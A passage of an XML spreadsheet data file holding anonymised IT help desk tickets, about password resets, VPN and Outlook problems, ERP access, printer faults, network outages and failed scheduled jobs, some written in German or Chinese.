    <s v="lxfnwyuv bqmjyprz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="setup we78 \ewew8323646 \lxfnwyuv bqmjyprz"/>
    <s v="setup we78 \ewew8323646 \lxfnwyuv bqmjyprz"/>
    <s v="lxfnwyuv bqmjyprz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="momitor defekt \niptbwdq csenjruz"/>
    <s v="momitor defekt \niptbwdq csenjruz"/>
    <s v="niptbwdq csenjruz"/>
    <x v="24"/>
  </r>
  <r>
    <s v="hip 10 ersatz- festplatte erstellen!"/>
    <s v="hip 10 ersatz- festplatte erstellen!"/>
    <s v="kuemonqi rtexzlvh"/>
    <x v="32"/>
  </r>
  <r>
    <s v="neuen ordner im info von EU_tool anlegen (please create new folder )"/>
    <s v="_x000d__x000a__x000d__x000a_received from: qavdrpfu.ylfwnbkr@gmail.com_x000d__x000a__x000d__x000a_hallo,_x000d__x000a__x000d__x000a_bitte im EU_tool unter infos einen neuen pfad anlegen._x000d__x000a__x000d__x000a_[cid:image001.png@01d223c0.fSID_21c960][cid:image002.jpg@01d223c0.fSID_21c960]_x000d__x000a__x000d__x000a_[cid:image003.jpg@01d223c0.fSID_21c960]_x000d__x000a__x000d__x000a_unter impact award ein neues verzeichnis anlegen._x000d__x000a_als bezeichnung bitte erp pm verwenden._x000d__x000a__x000d__x000a_die dateien zum visualisieren befinden sich auf_x000d__x000a_i:\handbÃ¼cher\erp pm&lt;file:///\\HostName_579\info\handbÃ¼cher\erp%20pm&gt;_x000d__x000a__x000d__x000a_[cid:image004.jpg@01d223c0.fSID_21c960]_x000d__x000a__x000d__x000a_reason :_x000d__x000a_[â€Ž10/â€Ž13/â€Ž16 3:19 pm] qavdrpfu ylfwnbkr: _x000d__x000a_i have created some traiyctrhbkm plvnuxmrterial for our shopflor workers for our new erp pm system for creating breakdown notifications_x000d__x000a_so they will have a chance to look into this traiyctrhbkm plvnuxmrterial when they want to do any notification fjaqbgnld yukdzwxs people._x000d__x000a_because we still started with erp pm and our old system was a part of EU_tool_x000d__x000a_called azm._x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen / best "/>
    <s v="qavdrpfu ylfwnbkr"/>
    <x v="25"/>
  </r>
  <r>
    <s v="s&amp;op password"/>
    <s v="help desk,_x000d__x000a_please check stefyty's account in supply_chain_software._x000d__x000a__x000d__x000a_"/>
    <s v="ftnijxup sbltduco"/>
    <x v="0"/>
  </r>
  <r>
    <s v="replizieren"/>
    <s v="_x000d__x000a__x000d__x000a_received from: trgqbeax.hfyzudql@gmail.com_x000d__x000a__x000d__x000a_hallo_x000d__x000a__x000d__x000a_leider repliziert mein laptop im firmennetz nur rudimentÃ¤r, im iphone bekomme ich die neusten emails. das problem haben auch andere kollegen hier am standort._x000d__x000a__x000d__x000a__x000d__x000a_[cid:image001.png@01d223be.6f558640]_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_mit freundlichen grÃ¼ÃŸen |  best "/>
    <s v="trgqbeax hfyzudql"/>
    <x v="0"/>
  </r>
  <r>
    <s v="network outage: engineering_toolkuznetsk warehouse - (company) network is down since 6:28 am et on 10/11."/>
    <s v="what type of outage:  ____x_network     _____circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    ____no_____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   ___6:28 am et on 10/11.____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__no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x v="7"/>
  </r>
  <r>
    <s v="HostName_1132: oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)"/>
    <s v="HostName_1132:  oracle finance_app financial management - web tier (epmsystem2) - service monitor(down)"/>
    <s v="rkupnshb gsmzfojw"/>
    <x v="11"/>
  </r>
  <r>
    <s v="unable to launch citrix."/>
    <s v="unable to launch citrix. error message atttached._x000a_"/>
    <s v="izhyoqms wecyhadn"/>
    <x v="11"/>
  </r>
  <r>
    <s v="job Job_505 failed in job_scheduler at: 10/11/2016 05:43:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_505 failed in job_scheduler at: 10/11/2016 05:43:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="crm dynamics - open opportunities from lvdyrqfc pfnmjsok"/>
    <s v="_x000a__x000a_received from: ctzykflo.evzbhgru@gmail.com_x000a__x000a_dear all,_x000a__x000a_lvdyrqfc pfnmjsok (personnel # 10780975, userid: webyutelc) lost/deleted by mistake his open opportunities (1 week ago)._x000a__x000a_can someone please check if these open opportunities can be restored._x000a__x000a_"/>
    <s v="ctzykflo evzbhgru"/>
    <x v="39"/>
  </r>
  <r>
    <s v="barcode scanner defekt \paternoster"/>
    <s v="barcode scanner defekt \paternoster"/>
    <s v="xwirzvda okhyipgr"/>
    <x v="24"/>
  </r>
  <r>
    <s v="job Job_593 failed in job_scheduler at: 10/11/2016 04:28:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_593 failed in job_scheduler at: 10/11/2016 04:28:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="reset erp password"/>
    <s v="_x000a__x000a_received from: ztswnaom.lrapiwex@gmail.com_x000a__x000a_dear admin,_x000a__x000a_may i request to reset erp password for the following user._x000a__x000a_othyoiz_x000a__x000a_"/>
    <s v="ztswnaom lrapiwex"/>
    <x v="0"/>
  </r>
  <r>
    <s v="please check jeffrghryey's account in supply_chain_software."/>
    <s v="help desk,_x000d__x000a_please check jeffrghryey's account in supply_chain_software._x000d__x000a__x000d__x000a_"/>
    <s v="ftnijxup sbltduco"/>
    <x v="0"/>
  </r>
  <r>
    <s v="einstellungen am alfa set messgerÃ¤t Ã¼berprÃ¼fen."/>
    <s v="am rollomatic alfa set messgerÃ¤t mÃ¼ssen die einstellungen laut anleitung Ã¼berprÃ¼ft werden."/>
    <s v="hwfckjzs abxdmyho"/>
    <x v="32"/>
  </r>
  <r>
    <s v="reset the password for eglavnhx uprodleq on erp / produktion / erp"/>
    <s v="bitte passwort fÃ¼r benutzer &quot;franhtyuj1&quot; zurÃ¼cksetzten, wurde mehrfach falsch eingegeben._x000d__x000a_danke"/>
    <s v="eglavnhx uprodleq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="power outage: india plant - india () telecom_vendor_3 40mbps secondary circuit  is down since 3:26 am et on 10/11/16."/>
    <s v="what type of outage:  _____network     ___x__circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _____yes____     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   _____3:26 am et on 10/11/16._________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _____no__    (yes/no/na)     company power  _________     provider power __________x000d__x000a_                _x000d__x000a_4.  scheduled maintenance ( network) ? ____no___    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  _yes_____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   ______yes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yes_     (yes/no/na) _x000d__x000a__x000d__x000a_11. vendor ticket  # ( global_telecom_1, verizon, telecom_vendor_1, telecom_vendor_2 )    __telecom_vendor_3:#31345563_______________________       _x000d__x000a__x000d__x000a_12. notified  gsc  ________     (yes/no/na)    cert started  ?________    (yes/no/na) _x000d__x000a__x000d__x000a_13.  additional diagnostics"/>
    <s v="utyeofsk rdyzpwhi"/>
    <x v="7"/>
  </r>
  <r>
    <s v="po number 5615755997 has been posted gr with incorrect gl account "/>
    <s v="po number 5615755997 has been posted gr with incorrect gl account "/>
    <s v="ihfkwzjd erbxoyqk"/>
    <x v="9"/>
  </r>
  <r>
    <s v="please check brook's account in supply_chain_software"/>
    <s v="please check brook's account in supply_chain_software"/>
    <s v="mrzgjdal whnldmef"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp schulung raum :7 kann  beamer nicht verbinden"/>
    <s v="erp schulung raum :7 kann  beamer nicht verbinden"/>
    <s v="dkinobsv wymgzcrh"/>
    <x v="28"/>
  </r>
  <r>
    <s v="passwordproblems"/>
    <s v="_x000a__x000a_received from: agjzikpf.nhfrbxek@gmail.com_x000a__x000a_hi,_x000a__x000a_i just tried to change my password via passwordmanager and locked me totally._x000a__x000a_would you please be so kind and unlock me again so that i can change it again ?_x000a__x000a_mit freundlichen grÃ¼ÃŸen_x000a_agjzikpf nhfrbxek_x000a_analyst logistics_x000a_agjzikpf.nhfrbxek@gmail.com&lt;mailto:agjzikpf.nhfrbxek@gmail.com&gt;_x000a__x000a_company shared services gmbh_x000a_geschÃ¤ftsfÃ¼hrer: phvkowml azbtkqwx, naruedlk mpvhakdq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agjzikpf nhfrbxek"/>
    <x v="0"/>
  </r>
  <r>
    <s v="interface 1/0/8 and 1/0/12 are down on switch company-eu-deu-ds-germany-edksw001-3750-core-sw001 since 12:50am et on 10/11"/>
    <s v="interface 1/0/8 and 1/0/12 are down on switch company-eu-deu-ds-germany-edksw001-3750-core-sw001 since 12:50am et on 10/11"/>
    <s v="dkmcfreg anwmfvlg"/>
    <x v="7"/>
  </r>
  <r>
    <s v="circuit outage:germany: company-eu-deu-erkheim-dmvpn-2821-rtr01 is down since 2:09 am et on 10/11/16."/>
    <s v="what type of outage:  _____network     _____x circuit     _____power (please specify what type of outage)_x000d__x000a__x000d__x000a_1. top 23 cert site   ?    _______no__     (yes/no/na) _x000d__x000a__x000d__x000a_2. when did it start  ?   __2:09 am et on 10/11/16.____________________x000d__x000a__x000d__x000a_3.  scheduled maintenance ( power) ? _____no__    (yes/no/na)     company power  _________     provider power __________x000d__x000a_               _x000d__x000a_4.  scheduled maintenance ( network) ? _____no_    (yes/no/na)     company maint________ (yes/no)       provider maint/ticket #__________________    _x000d__x000a__x000d__x000a_5. does site have a backup circuit ?  __yes____    (yes/no/na) _x000d__x000a__x000d__x000a_6. backup circuit active ?   _____yes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x v="7"/>
  </r>
  <r>
    <s v="eilt !!! monitor defekt "/>
    <s v="monitor defekt _x000d__x000a_fuer hr. tjzohmve wusgaozx_x000d__x000a__x000d__x000a_neu bau 6 stock, #503"/>
    <s v="qfwnbutk jtenbvkq"/>
    <x v="28"/>
  </r>
  <r>
    <s v="erp gui login profile missing ."/>
    <s v="erp gui login profile missing . erp cannot login."/>
    <s v="zmkitbsh bxsyaipz"/>
    <x v="31"/>
  </r>
  <r>
    <s v="device does not properly boot up windows - system hangs before user login"/>
    <s v="device does not properly boot up windows - system hangs before user login"/>
    <s v="qkxewzjh outjqilv"/>
    <x v="28"/>
  </r>
  <r>
    <s v="pls. help to run out dn under sto#5019320060,thx!"/>
    <s v="_x000a__x000a_received from: wktesmbp.lorjymef@gmail.com_x000a__x000a_dear team,_x000a_we got a stock recall notic#plant_101-101016-01 for mm#3098450 &amp; should return 373pc materials to plant_101,then i created sto#5019320060 base on this recall._x000a_dn#916955708/105pc was just created against the sto, pls. help to run out the dn of rest 268pc ,thx a lot!_x000a_[cid:image001.png@01d223c2.0ac78080]_x000a_b.rgds_x000a_judthtihty.zhuyhts_x000a_company hardpoint apac-wgq dc_x000a__x000a__x000a_"/>
    <s v="wktesmbp lorjymef"/>
    <x v="5"/>
  </r>
  <r>
    <s v="job Job_1148 failed in job_scheduler at: 10/11/2016 01:15:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1148 failed in job_scheduler at: 10/11/2016 01:15:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="msd crm"/>
    <s v="please provide details of the issue._x000d__x000a__x000d__x000a_i'm not able to view the attachment of customer 81053386._x000d__x000a_yesterday i received the hourglass only. loging on and off didn't solve the issue._x000d__x000a_today the following message is displaying on the bottom:_x000d__x000a_   javascript:void(0)"/>
    <s v="atlwdyej vtlhzbix"/>
    <x v="14"/>
  </r>
  <r>
    <s v="job Job_1141 failed in job_scheduler at: 10/11/2016 00:02:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1141 failed in job_scheduler at: 10/11/2016 00:02:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="job Job_1141 failed in job_scheduler at: 10/10/2016 23:45:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_1141 failed in job_scheduler at: 10/10/2016 23:45:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="8"/>
  </r>
  <r>
    <s v="kis_zebra print"/>
    <s v="_x000d__x000a__x000d__x000a_received from: gkwcxzum.answkqpe@gmail.com_x000d__x000a__x000d__x000a_dear all_x000d__x000a__x000d__x000a_this is jay from plant_69._x000d__x000a_plant_69 receives airwaybill label from erp whenever we do pgi for export. sometimes, zebra printer doesn't print the label so_x000d__x000a_plant_69 cancel the shipment and re-do pgi._x000d__x000a__x000d__x000a_is there another way for us to have the label not to cancel pgi and re-do pgi ?_x000d__x000a__x000d__x000a_"/>
    <s v="gkwcxzum answkqpe"/>
    <x v="17"/>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quxtnlgd tqnjyzsm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="job bkwin_HostName_770_inc failed in job_scheduler at: 10/10/2016 22:38:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job bkwin_HostName_770_inc failed in job_scheduler at: 10/10/2016 22:38:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="4"/>
  </r>
  <r>
    <s v="job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 10/10/2016 22:37:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job pp_EU_tool_netch_keheu2 failed in job_scheduler at: 10/10/2016 22:37:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="wifi ä¸èƒ½åœ¨çº¿"/>
    <s v="wifi ä¸èƒ½åœ¨çº¿"/>
    <s v="qnvkwalx dfjtxigl"/>
    <x v="30"/>
  </r>
  <r>
    <s v="job SID_56filesys failed in job_scheduler at: 10/10/2016 22:24:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job SID_56filesys failed in job_scheduler at: 10/10/2016 22:24:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="æ— æ³•åˆ›å»ºskypeä¼šè®®ï¼Œoutlook æ—¥åŽ†ä¸Šé¢æ²¡æœ‰ skype online meeting åŠ è½½é¡¹ã€‚"/>
    <s v="æ— æ³•åˆ›å»ºskypeä¼šè®®ï¼Œoutlook æ—¥åŽ†ä¸Šé¢æ²¡æœ‰ skype online meeting åŠ è½½é¡¹ã€‚"/>
    <s v="dqovxreg qswvlctg"/>
    <x v="31"/>
  </r>
  <r>
    <s v="æˆ‘çš„outlook æ‰“å°é‚®ä»¶è®¾ç½®çºµå‘ï¼Œæ‰“å‡ºæ¥éƒ½æ˜¯æ¨ªå‘çš„ï¼Œèƒ½å¸®æˆ‘çœ‹ä¸€ä¸‹å—ï¼Ÿ"/>
    <s v="æˆ‘çš„outlook æ‰“å°é‚®ä»¶è®¾ç½®çºµå‘ï¼Œæ‰“å‡ºæ¥éƒ½æ˜¯æ¨ªå‘çš„ï¼Œèƒ½å¸®æˆ‘çœ‹ä¸€ä¸‹å—ï¼Ÿ_x000a_dizquolf hlykecxa_x000a_ap accountant_x000a_dizquolf.hlykecxa@gmail.com_x000a_"/>
    <s v="dizquolf hlykecxa"/>
    <x v="31"/>
  </r>
  <r>
    <s v="posed inwarehouse_tool no.6223538861 cannot be shown in erp"/>
    <s v="we posed po5616691482 in miro and erp issued no.6223538861. however, this voucher no. does not exist in fb03 as attachment shown. and in me23n, ir cannot be found after making gr and in fbl1n, the transaction still does not exist. only in mir4, no.6223538861 is shown as the posed inwarehouse_tool._x000d__x000a_please tell us resolve the problem. "/>
    <s v="dizquolf hlykecxa"/>
    <x v="9"/>
  </r>
  <r>
    <s v="carrier orders not processing."/>
    <s v="carrier orders not processing labels through shipping system in erp. getting the following error message. server is unable to process the request"/>
    <s v="tmyeqika hfudpeot"/>
    <x v="17"/>
  </r>
  <r>
    <s v="unable to connect to glog-old to search old data"/>
    <s v="please assign this ticket to keyhtyvin toriaytun.  the glovia database is down."/>
    <s v="mfvkxghn mzjasxqd"/>
    <x v="2"/>
  </r>
  <r>
    <s v="sales orders are not updating with correct delivery dates "/>
    <s v="this is in reference to so# 35086652_x000d__x000a__x000d__x000a_this all started with this email; &quot;i called company and spoke with wkpnlvts oumeaxcz and has confirmed that the items are in route from germany and are scheduled to get to them on 10/18/16 and turn around and ship to us.  the new delivery date is for 10/19/16.  she was not sure why the date of 12/16/16 is on the company center.&quot;_x000d__x000a__x000d__x000a_after investigating this and looking at screen shots provided by heidi, this is what is happening.  &quot;manufacturing updated the information in the system, and if a csr ran an apo availability check on the art, they could see the updated date of 10/19, but it did not update the delivery date in the order.  i went into the order and manually ran a apo stock update on the order, and it updated the delivery date to 10/19.  if the customer were to look at it now through company center, they would see a delivery date of 10/19.&quot;_x000d__x000a__x000d__x000a_when manufacturing updates the delivery time for an order, it has to update on all open orders for that item.  in this case it did not.  we are loosing orders because of this issue as it has been going on for some time now, but this is the first time i have documented screen shots of what was going on.  csrs can not run apo every time a date is changed in erp.  this has to be automated.  anything less is unacceptable.  _x000d__x000a_ "/>
    <s v="amunklhx bvrachko"/>
    <x v="5"/>
  </r>
  <r>
    <s v="need ticket"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dqplrwoy.cutpwjie@gmail.com_x000d__x000a__x000d__x000a_2108696 â€“ this item was manufactured at plant_248 and received into plant_249.  it was received into stock at plant_249 on sept 14._x000d__x000a__x000d__x000a_at that point i would have expected the system to have automatically moved the product to plant_101 where there is safety stock and forecast._x000d__x000a__x000d__x000a_can you please advise if the process is working?  if it is working, can you please advise why this item did not move._x000d__x000a__x000d__x000a__x000d__x000a_dqplrwoy cutpwjie_x000d__x000a_supply chain planner_x000d__x000a_strategic sourcing and supply planning_x000d__x000a_dqplrwoy.cutpwjie@gmail.com&lt;mailto:dqplrwoy.cutpwjie@gmail.com&gt;_x000d__x000a_724-539-5632_x000d__x000a__x000d__x000a_company inc. | 1600 technology way | usa, pa 15650 | www.company.com&lt;_x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a__x000d__x000a_"/>
    <s v="dqplrwoy cutpwjie"/>
    <x v="5"/>
  </r>
  <r>
    <s v="problem w/downloading .dxf files- error &quot;certificate does not exist&quot; - business_client- product engineering-"/>
    <s v="contact sitmzuje ckrpsabm _x000a_unable to save/download .dxf files when using the business_client.(screenshot attached)_x000a__x000a_error message persists when attempting to download the .dxf 2d engineering_drawing_tool files from the business_client(web based format). (from path business_client &gt; product engineering &gt; drawing search &gt; display document &gt; select document (e.g. 71322408_nxd_000~03.dxf )&gt;&quot;copy to&quot; &gt;select directory &gt; c:\users\mazurjw\documents\my drawings\ &gt; result = &quot;certificate does not exist&quot;"/>
    <s v="sitmzuje ckrpsabm"/>
    <x v="2"/>
  </r>
  <r>
    <s v="password reset"/>
    <s v="from: microsoft on behalf of company inc. [mailto:msonlineservicesteam@microsoftonline.com] _x000a_sent: monday, october 10, 2016 8:59 pm_x000a_to: nwfodmhc exurcwkm_x000a_cc: tiyhum kuyiomar_x000a_subject: amar request to reset microsoft online services password for xbfcitlh.ntulmcpq@gmail.com_x000a_importance: high_x000a__x000a_    request to reset user's password   _x000a_   the following user in your organization has requested a password reset be performed for their account: _x000a__x000a_â€¢ xbfcitlh.ntulmcpq@gmail.com _x000a_â€¢ first name: theydbar _x000a_â€¢ last name: brrgtyanthet-perry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xbfcitlh ntulmcpq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to take screenshot"/>
    <s v="unable to take screenshot"/>
    <s v="rolcgqhx ehndjmlv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="vip 2 // reset the password for buyoipdj fceymwtz on other / phone system - interaction desktop"/>
    <s v="only need password rest for the phone in my office"/>
    <s v="buyoipdj fceymwtz"/>
    <x v="6"/>
  </r>
  <r>
    <s v="unable to open a website"/>
    <s v="unable to open a website"/>
    <s v="keqvyfzw qwbohdxg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="printer configure"/>
    <s v="64 bit printer driver installation on new laptop"/>
    <s v="uvrbhlnt bjrmalzi"/>
    <x v="18"/>
  </r>
  <r>
    <s v="customers not able to call into the company toll free number.  "/>
    <s v="i just received a call from our sales person badgknqs xwelumfz, in st. louis mo stating that he tried to call in on the toll free number 10 time but received a message that the number was not in service. i checked the number he was dialing and he is dialing the correct number   urgent.  "/>
    <s v="amunklhx bvrachko"/>
    <x v="7"/>
  </r>
  <r>
    <s v="password reset from password_management_tool"/>
    <s v="password reset from password_management_tool"/>
    <s v="plqbesvo uopaexic"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_37 password reset"/>
    <s v="erp SID_37 password reset"/>
    <s v="muaqyliw sndypzlb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issues with outlook // not responding"/>
    <s v="issues with outlook // not responding"/>
    <s v="krpvcmzg gyhfalmb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 password reset"/>
    <s v="erp SID_34 password reset"/>
    <s v="wvqgbdhm fwchqjor"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not working correctly"/>
    <s v="outlook not working correctly  &amp; freezing"/>
    <s v="hvstqfwc buvsrnze"/>
    <x v="0"/>
  </r>
  <r>
    <s v="msd crm - outlook stops responding"/>
    <s v="we ensured ipv6 was unchecked and that network connection was good. it was 'limited' initially but went to normal once denghyrt disconnected from vpn._x000d__x000a_checked that outlook works okay in safe mode. reduced offline folder settings to 3 months from 12 months._x000d__x000a_uninstalled and reinstalled crm dynamics (repair did not help)._x000d__x000a_denghyrt will im me if he has any issues with tasks or reminders in crm (fdmaluyo.tvecikxn@gmail.com)_x000d__x000a_"/>
    <s v="rwyfmclk ugbvnwtq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ess password reset"/>
    <s v="ess password reset"/>
    <s v="uhrixnta odueantp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="issue with outlook and vpn"/>
    <s v="issue with outlook and vpn"/>
    <s v="mdbegvct dbvichlg"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ich kann meinen vpn nicht Ã¶ffnen"/>
    <s v="ich kann meinen vpn nicht Ã¶ffnen"/>
    <s v="anivdcor rbmfhiox"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open records in engineering_tool."/>
    <s v="engineering tool is downloading reports in .kpr format and engineering tool crashes. on reinstalling engineering tool, it is crashing too._x000d__x000a_"/>
    <s v="oujvmgeq spobcflw"/>
    <x v="2"/>
  </r>
  <r>
    <s v="password reset from password_management_tool"/>
    <s v="password reset from password_management_tool"/>
    <s v="gbwviklo ukwijqtm"/>
    <x v="0"/>
  </r>
  <r>
    <s v="knocked off vpn/ unable to get on na remote"/>
    <s v="i was knocked off vpn at about 11:55am.  now i am unable to log back in via na remote."/>
    <s v="gakceqyb edrjthvo"/>
    <x v="0"/>
  </r>
  <r>
    <s v="etime not working"/>
    <s v="name:esqcuwbg gdcuhzqw_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:esqcuwbg.gdcuhzqw@gmail.com_x000a_customer number:_x000a_telephone:_x000a_summary:me e-time will not populate the names of my employees_x000a_"/>
    <s v="esqcuwbg gdcuhzqw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for hybiaxlk lawptzir using password_management_tool password reset."/>
    <s v="the"/>
    <s v="hybiaxlk lawptzir"/>
    <x v="16"/>
  </r>
  <r>
    <s v="job Job_370 failed in job_scheduler at: 10/78.93.52.6791:18:00  "/>
    <s v="received from: monitoring_tool@company.com_x000d__x000a__x000d__x000a_job Job_370 failed in job_scheduler at: 10/78.93.52.6791:18:00"/>
    <s v="bpctwhsn kzqsbmtp"/>
    <x v="7"/>
  </r>
  <r>
    <s v="bgflmyar.xgufkidq@gmail.com"/>
    <s v="bgflmyar.xgufkidq@gmail.com wanted to check if he can login to hr_tool on his phone"/>
    <s v="olckhmvx pcqobjnd"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp front end missing"/>
    <s v="i noticed that my erp front end programdnty seems to be gone for some reason. i will need this returned immediately to my desktop, with all prior levels of access set for it. "/>
    <s v="ferxqvsm esmwxqlf"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to access erp "/>
    <s v="unable to access erp _x000a__x000a_user contacted for an issue where she's unable to access erp after her id got changed last friday._x000a_i checked in password_management_tool and it's not showing any erp accounts under her name. only shows active directory and servers._x000a_please help check with the user at the earliest on this as she needs to access erp SID_34 erp production._x000a__x000a__x000a_old user id - coppthsy_x000a_new user id - humthyphk_x000a_"/>
    <s v="edqylkio ykomciav"/>
    <x v="19"/>
  </r>
  <r>
    <s v="unable to share calendar"/>
    <s v="unable to share calendar"/>
    <s v="vgtpkjhn flwsytik"/>
    <x v="0"/>
  </r>
  <r>
    <s v="outlook not launching"/>
    <s v="outlook not launching"/>
    <s v="hybiaxlk lawptzir"/>
    <x v="0"/>
  </r>
  <r>
    <s v="zebra pinter not working"/>
    <s v="_x000a_name:lzapwbnc yrjekzqv_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:lzapwbnc.yrjekzqv@gmail.com&gt;_x000a_customer number:_x000a_telephone:_x000a_summary:hi, after an automatci upgrade i cannot print on zebra printer anymore.  the error message is runtime error 13_x000a_type mismatch._x000a_can you give me support _"/>
    <s v="lzapwbnc yrjekzqv"/>
    <x v="0"/>
  </r>
  <r>
    <s v="blank call // loud noise // gso"/>
    <s v="blank call // loud noise // gso"/>
    <s v="rbozivdq gmlhrtvp"/>
    <x v="0"/>
  </r>
  <r>
    <s v="there a way to access hr_tool e-time from mobile device"/>
    <s v="name:bgflmyar xgufkidq_x000a_language:_x000a_browser:microsoft internet explorer_x000a_email:bgflmyar.xgufkidq@gmail.com_x000a_customer number:_x000a_telephone_x000a_summary:is there a way to access hr_tool e-time from mobile device?"/>
    <s v="bgflmyar xgufkidq"/>
    <x v="0"/>
  </r>
  <r>
    <s v="unable to open a website"/>
    <s v="unable to open a website"/>
    <s v="bsujizqk zmlfkengineering_tool"/>
    <x v="0"/>
  </r>
  <r>
    <s v="company center not pulling information from erp"/>
    <s v="i have several company center accounts that are not pulling information from erp.  i checked to make sure they were created correctly and they are.  this is effecting channel partners ability to use company center."/>
    <s v="qcfmxgid jvxanwre"/>
    <x v="21"/>
  </r>
  <r>
    <s v="vpn"/>
    <s v="vpn : vpn is working."/>
    <s v="dhraxivp enmfvuqb"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 locked out."/>
    <s v="erp SID_34 locked out."/>
    <s v="tfzlohik esibqtvy"/>
    <x v="0"/>
  </r>
  <r>
    <s v="erp SID_34 and erp SID_1 password reset"/>
    <s v="erp SID_34 and erp SID_1 password reset"/>
    <s v="bixvmnar glakoprc"/>
    <x v="0"/>
  </r>
  <r>
    <s v="ethics flash player issue."/>
    <s v="ethics flash player issue."/>
    <s v="lwgytuxq qspdztiw"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset passwords for fylrosuk kedgmiul using password_management_tool password reset."/>
    <s v="the"/>
    <s v="fylrosuk kedgmiul"/>
    <x v="16"/>
  </r>
  <r>
    <s v="reset passwords for fylrosuk kedgmiul using password_management_tool password reset."/>
    <s v="the"/>
    <s v="fylrosuk kedgmiul"/>
    <x v="16"/>
  </r>
  <r>
    <s v="please to extend the user validation to development environment (SID_21) still are expired. - user vvamrtryot"/>
    <s v="please to extend the user validation to development environment (SID_21) still are expired. - user vvamrtryot"/>
    <s v="gdsjrxwl pzhyxdiq"/>
    <x v="19"/>
  </r>
  <r>
    <s v="vpn is not working."/>
    <s v="vpn is not working."/>
    <s v="uyrpdvoq mbzevtcx"/>
    <x v="0"/>
  </r>
  <r>
    <s v="us_plant (plant_269) - servers not connecting"/>
    <s v="_x000d__x000a__x000d__x000a_received from: dpuifqeo.eglwsfkn@gmail.com_x000d__x000a__x000d__x000a_plant servers â€“ HostName_1259 and lrrsm007 â€“ are not connecting._x000d__x000a__x000d__x000a_i can see gtehdnyu lights on the front of the server, but they are not blinking._x000d__x000a__x000d__x000a_"/>
    <s v="dpuifqeo eglwsfkn"/>
    <x v="11"/>
  </r>
  <r>
    <s v="printer problem / issue information -- zebra label printers"/>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all usa zebra label printers -- s4m models_x000d__x000a_ _x000d__x000a_   â€¢  detailed description of the problem ? the zebra print software will not connect to erp.  see attached photos for errors received._x000d__x000a__x000d__x000a_   â€¢  type of documents not printing?  product labels_x000d__x000a__x000d__x000a_   â€¢  what system or application being used at time of the problem?   zebra print_x000d__x000a__x000d__x000a_   â€¢  if not printing at all, does it respond to a ping command on the network and has a power cycle of the printer been completed? printer is able to print windows uacyltoe hxgaycze pages so it does not appear to be a pc/network/printer issue_x000d__x000a__x000d__x000a_   â€¢  if erp system, which system?  SID_34_x000d__x000a__x000d__x000a_      â€¢  if it's an erp printer problem can the erp output be rerouted to another erp printer temporarily? no_x000d__x000a_         what printer can it be rerouted too? _x000d__x000a__x000d__x000a_   â€¢  if document is not printing correctly, please scan copy of the document and attach to the ticketing_tool ticket."/>
    <s v="okfmbqur efzukjsa"/>
    <x v="0"/>
  </r>
  <r>
    <s v="reset the password for kslhobgj cyhvefna on other / interaction desktop"/>
    <s v="reset the password for kslhobgj cyhvefna on other / interaction desktop"/>
    <s v="kslhobgj cyhvefna"/>
